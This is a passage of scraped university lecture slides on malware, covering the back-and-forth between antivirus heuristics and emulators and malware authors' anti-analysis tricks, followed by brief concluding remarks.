![Page 79: Malware - California State Polytechnic University, Pomona · • Melissa and other macro viruses like it were able to spread and do their destruction to both Macintosh and Windows](https://reader033.fdocuments.us/reader033/viewer/2022042310/5ed73161c30795314c175eec/html5/thumbnails/79.jpg)
MalwareDetection
• Anti-virus engines started using heuristic algorithms in order to determine the evil code that existed in these programs.
• This was circumvented by-- hilariously-- studying the algorithms and getting around them.
• Repeat ad-infinitum.
![Page 80: Malware - California State Polytechnic University, Pomona · • Melissa and other macro viruses like it were able to spread and do their destruction to both Macintosh and Windows](https://reader033.fdocuments.us/reader033/viewer/2022042310/5ed73161c30795314c175eec/html5/thumbnails/80.jpg)
MalwareDetection
• Obviously in order to glean any sort of signature information from a given binary, one must analyze the program.
• Malware then began shipping with anti-debug and anti-analysis tricks.
• With each passing trick, one was circumvented and three were created.
![Page 81: Malware - California State Polytechnic University, Pomona · • Melissa and other macro viruses like it were able to spread and do their destruction to both Macintosh and Windows](https://reader033.fdocuments.us/reader033/viewer/2022042310/5ed73161c30795314c175eec/html5/thumbnails/81.jpg)
MalwareDetection
• Malware analysis has gotten to the point where anti-virus companies are using emulators and other intensely complicated techniques in order to analyze a binary.
• And the malware authors have found vulnerabilities in this process, not to mention anti-emulation techniques that prevent the researchers from getting any semblance of analysis done!
![Page 82: Malware - California State Polytechnic University, Pomona · • Melissa and other macro viruses like it were able to spread and do their destruction to both Macintosh and Windows](https://reader033.fdocuments.us/reader033/viewer/2022042310/5ed73161c30795314c175eec/html5/thumbnails/82.jpg)
Conclusions
![Page 83: Malware - California State Polytechnic University, Pomona · • Melissa and other macro viruses like it were able to spread and do their destruction to both Macintosh and Windows](https://reader033.fdocuments.us/reader033/viewer/2022042310/5ed73161c30795314c175eec/html5/thumbnails/83.jpg)
MalwareConclusions
• Malware exhibits similar properties to actual viruses. By attempting to eradicate them, they evolve to become stronger and more resistant.
• Malware has a lot of money behind it-- spammers, scammers and other baddies have their hands deep in the game.
![Page 84: Malware - California State Polytechnic University, Pomona · • Melissa and other macro viruses like it were able to spread and do their destruction to both Macintosh and Windows](https://reader033.fdocuments.us/reader033/viewer/2022042310/5ed73161c30795314c175eec/html5/thumbnails/84.jpg)
MalwareConclusions
• Malware is hard to detect. It is always evolving, always changing and always masking itself.
• People are stupid.
• Therefore, malware will always exist.
![Page 85: Malware - California State Polytechnic University, Pomona · • Melissa and other macro viruses like it were able to spread and do their destruction to both Macintosh and Windows](https://reader033.fdocuments.us/reader033/viewer/2022042310/5ed73161c30795314c175eec/html5/thumbnails/85.jpg)
The End